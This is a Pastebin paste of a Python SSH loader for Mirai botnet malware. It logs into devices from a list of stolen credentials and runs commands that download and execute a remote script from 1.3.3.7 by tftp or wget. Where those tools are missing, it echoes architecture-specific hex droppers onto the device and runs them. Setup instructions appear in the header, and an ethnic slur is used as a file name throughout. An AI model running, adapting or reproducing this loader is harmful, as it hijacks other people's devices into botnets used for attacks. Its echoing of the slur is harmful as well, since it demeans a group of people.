Advertisement
miraip0ts

ssh_echo_Loader

Apr 27th, 2018
1,265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.73 KB | None | 0 0
  1. #! python !#
  2. """
  3. +_SSH Loader with echo loading | BY; LiGhT_+
  4. Requires(READ):
  5.     -hex.py --- Link here -> https://pastebin.com/eC4YAD0W
  6.     -dlr(retriever) binarys for mirai
  7.     -NOT TO BE A DUMBASS! <---------
  8.   +DO NOT USE EXCESSIVE THREADS  |-------------------------------------------------------------------------------
  9.   +Make a dir called bins/ and put ur dlrs and hex.py in there then run hex.py after configuring it on the binarys then u should have some .hex files in dir bins/
  10.   +then leave to ur loader and configure lines 29, 30, 34(directory where bins and .hex files are)
  11. ---
  12. (!) KEEP "cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA" and put it in ur tftp.sh and bins.sh instead of that stupid shit u kids think works
  13. """
  14.  
  15. from threading import Thread
  16. #from multiprocessing import Process
  17. import sys, os, re, time, socket
  18. from Queue import *
  19. from sys import stdout
  20. import glob
  21. import paramiko
  22.  
  23. if len(sys.argv) < 3:
  24.     sys.exit("Usage: python "+sys.argv[0]+" <list> <threads>")
  25.  
  26. paramiko.util.log_to_file("/dev/null")
  27. c = open(sys.argv[1], "r").readlines()
  28. threads = int(sys.argv[2])
  29. cmd_TFTP = "cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA; tftp -r tbin.sh -g 1.3.3.7; sh tbin.sh"
  30. cmd_WGET = "cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA; wget http://1.3.3.7:80/bin.sh; sh bin.sh"
  31. queue = Queue()
  32. qc = 0
  33.  
  34. dropper_dir = "bins/*"
  35. droppers = glob.glob(dropper_dir)
  36. for dropper in droppers:
  37.     if "x86" in dropper:
  38.         print "x86 Dropper Added"
  39.         X86 = dropper
  40.     elif "arm" in dropper and "7" not in dropper:
  41.         print "ARM Dropper Added"
  42.         ARM = dropper
  43.     elif "arm7" in dropper:
  44.         print "ARM7 Dropper Added"
  45.         ARM7 = dropper
  46.     elif "ppc" in dropper:
  47.         print "PPC Dropper Added"
  48.         PPC = dropper
  49.     elif "sh4" in dropper:
  50.         print "SH4 Dropper Added"
  51.         SH4 = dropper
  52.     elif "mips" in dropper:
  53.         print "Mips Dropper Added"
  54.         MIPS = dropper
  55.     elif "mpsl" in dropper:
  56.         print "Mipsel Dropper Added"
  57.         MPSL = dropper
  58. print
  59. for cs in c:
  60.     qc += 1
  61.     stdout.write("\r[%d] Added to queue" % qc)
  62.     stdout.flush()
  63.     queue.put(cs)
  64. print "\n"
  65.  
  66. def sshload(username,password,ip):
  67.     try:
  68.         ip = ip.rstrip("\n")
  69.         tftp = 0
  70.         wget = 0
  71.         echo = 0
  72.         port = 22
  73.         ssh = paramiko.SSHClient()
  74.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  75.         ssh.connect(ip, port = port, username=username, password=password, timeout=3)
  76.         print "Connected! %s"%(ip)
  77.         ssh.exec_command("sh")
  78.         time.sleep(0.001)
  79.         ssh.exec_command("enable")
  80.         time.sleep(0.001)
  81.         ssh.exec_command("system")
  82.         time.sleep(0.001)
  83.         ssh.exec_command("shell")
  84.         time.sleep(0.001)
  85.         ssh.exec_command("cat | sh")
  86.         time.sleep(0.001)
  87.         stdin, stdout, stderr = ssh.exec_command("/bin/busybox")
  88.         o = stdout.read()
  89.         #checking
  90.         if "tftp" in o and "BusyBox" in o:
  91.             tftp = 1
  92.         elif "wget" in o and "BusyBox" in o:
  93.             wget = 1
  94.         elif "wget" not in o and "tftp" not in o and "BusyBox" in o:
  95.             echo = 1
  96. #       if "BusyBox" in o:
  97. #           echo = 1
  98. #       else:
  99. #           pass
  100.         #executing
  101.         if tftp:
  102.             print "(TFTP) COMMAND SENT: %s"%(ip)
  103.             ssh.exec_command(cmd_TFTP)
  104.             ssh.close()
  105.         elif wget:
  106.             print "(WGET) COMMAND SENT: %s"%(ip)
  107.             ssh.exec_command(cmd_WGET)
  108.             ssh.close()
  109.         elif echo:
  110.             time.sleep(0.001)
  111.             stdin, stdout, stderr = ssh.exec_command('cat /proc/cpuinfo | grep -E "model|type|imple"; uname -m')
  112.             ARCH_TYPE = stdout.read()
  113.             print "- CHECKING ARCH TO DEPLOY HEX %s"%(ip)
  114.             if "x86_64" in ARCH_TYPE:
  115.                 print "(ECHO) ARCH DETECTED: x86_64 %s:%s:%s"%(username,password,ip)
  116.                 a = open(X86, "r").readlines()
  117.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  118.                 ssh.exec_command("rm -rf .bot")
  119.                 for L in a:
  120.                     ssh.exec_command(L)
  121.                     time.sleep(0.005)
  122.                 ssh.exec_command("\n")
  123.                 print "executed %s:%s:%s"%(username,password,ip)
  124.             elif "ARMv4" in ARCH_TYPE or "armv4l" in ARCH_TYPE or "v4l" in ARCH_TYPE:
  125.                 print "(ECHO) ARCH DETECTED: ARM-4 %s:%s:%s"%(username,password,ip)
  126.                 b = open(ARM, "r").readlines()
  127.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  128.                 ssh.exec_command("rm -rf .bot")
  129.                 for L in b:
  130.                     ssh.exec_command(L)
  131.                     time.sleep(0.005)
  132.                 ssh.exec_command("\n")
  133.                 print "executed %s:%s:%s"%(username,password,ip)
  134.             elif "ARMv5" in ARCH_TYPE or "armv5l" in ARCH_TYPE or "v5l" in ARCH_TYPE:
  135.                 print "(ECHO) ARCH DETECTED: ARM-5 %s:%s:%s"%(username,password,ip)
  136.                 c = open(ARM, "r").readlines()
  137.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  138.                 ssh.exec_command("rm -rf .bot")
  139.                 for L in c:
  140.                     ssh.exec_command(L)
  141.                     time.sleep(0.005)
  142.                 ssh.exec_command("\n")
  143.                 print "executed %s:%s:%s"%(username,password,ip)
  144.             elif "ARMv6" in ARCH_TYPE or "armv6l" in ARCH_TYPE or "v6l" in ARCH_TYPE:
  145.                 print "(ECHO) ARCH DETECTED: ARM-6 %s:%s:%s"%(username,password,ip)
  146.                 d = open(ARM, "r").readlines()
  147.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  148.                 ssh.exec_command("rm -rf .bot")
  149.                 for L in d:
  150.                     ssh.exec_command(L)
  151.                     time.sleep(0.005)
  152.                 ssh.exec_command("\n")
  153.                 print "executed %s:%s:%s"%(username,password,ip)
  154.             elif "ARMv7" in ARCH_TYPE or "armv7l" in ARCH_TYPE or "v7l" in ARCH_TYPE:
  155.                 print "(ECHO) ARCH DETECTED: ARM-7 %s:%s:%s"%(username,password,ip)
  156.                 e = open(ARM7, "r").readlines()
  157.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  158.                 ssh.exec_command("rm -rf .bot")
  159.                 for L in e:
  160.                     ssh.exec_command(L)
  161.                     time.sleep(0.005)
  162.                 ssh.exec_command("\n")
  163.                 print "executed %s:%s:%s"%(username,password,ip)
  164.             elif "MIPS" in ARCH_TYPE or "mips16" in ARCH_TYPE:
  165.                 print "(ECHO) ARCH DETECTED: MIPS %s:%s:%s"%(username,password,ip)
  166.                 f = open(MIPS, "r").readlines()
  167.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  168.                 ssh.exec_command("rm -rf .bot")
  169.                 for L in f:
  170.                     ssh.exec_command(L)
  171.                     time.sleep(0.005)
  172.                 ssh.exec_command("\n")
  173.                 print "executed %s:%s:%s"%(username,password,ip)
  174.             elif "mips64" in ARCH_TYPE or "mipsel" in ARCH_TYPE:
  175.                 print "(ECHO) ARCH DETECTED: MIPSEL %s:%s:%s"%(username,password,ip)
  176.                 g = open(MPSL, "r").readlines()
  177.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  178.                 ssh.exec_command("rm -rf .bot")
  179.                 for L in g:
  180.                     ssh.exec_command(L)
  181.                     time.sleep(0.005)
  182.                 ssh.exec_command("\n")
  183.                 print "executed %s:%s:%s"%(username,password,ip)
  184.             elif "SUPERH" in ARCH_TYPE or "sh4" in ARCH_TYPE:
  185.                 print "(ECHO) ARCH DETECTED: SH4 %s:%s:%s"%(username,password,ip)
  186.                 h = open(SH4, "r").readlines()
  187.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  188.                 ssh.exec_command("rm -rf .bot")
  189.                 for L in h:
  190.                     ssh.exec_command(L)
  191.                     time.sleep(0.005)
  192.                 ssh.exec_command("\n")
  193.                 print "executed %s:%s:%s"%(username,password,ip)
  194.             elif "POWERPC" in ARCH_TYPE or "ppc" in ARCH_TYPE:
  195.                 print "(ECHO) ARCH DETECTED: PPC %s:%s:%s"%(username,password,ip)
  196.                 i = open(PPC, "r").readlines()
  197.                 ssh.exec_command("cd /tmp; echo ''>SANDNIGGA || cd /var; echo ''>SANDNIGGA")
  198.                 ssh.exec_command("rm -rf .bot")
  199.                 for L in i:
  200.                     ssh.exec_command(L)
  201.                     time.sleep(0.005)
  202.                 ssh.exec_command("\n")
  203.                 print "executed %s:%s:%s"%(username,password,ip)
  204.             ssh.exec_command("chmod 777 .bot; .bot; ./dvrHelper ssh.SandNigga")
  205.             time.sleep(10)
  206.             ssh.close()
  207.     except:
  208.         ssh.close()
  209.         pass
  210.  
  211. def main():
  212.     while True:
  213.         try:
  214.             for l in xrange(threads):
  215.                 try:
  216.                     IP = queue.get()
  217.                     ip = IP.split(":")                 
  218.                     thread = Thread(target=sshload, args=(ip[0],ip[1],ip[2],))
  219.                     thread.start()
  220.                     username=ip[0]
  221.                     password=ip[1]
  222.                     ip=ip[2]
  223.                     queue.task_done()
  224.                 except:
  225.                     pass
  226.             time.sleep(2)
  227.         except:
  228.             pass
  229. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement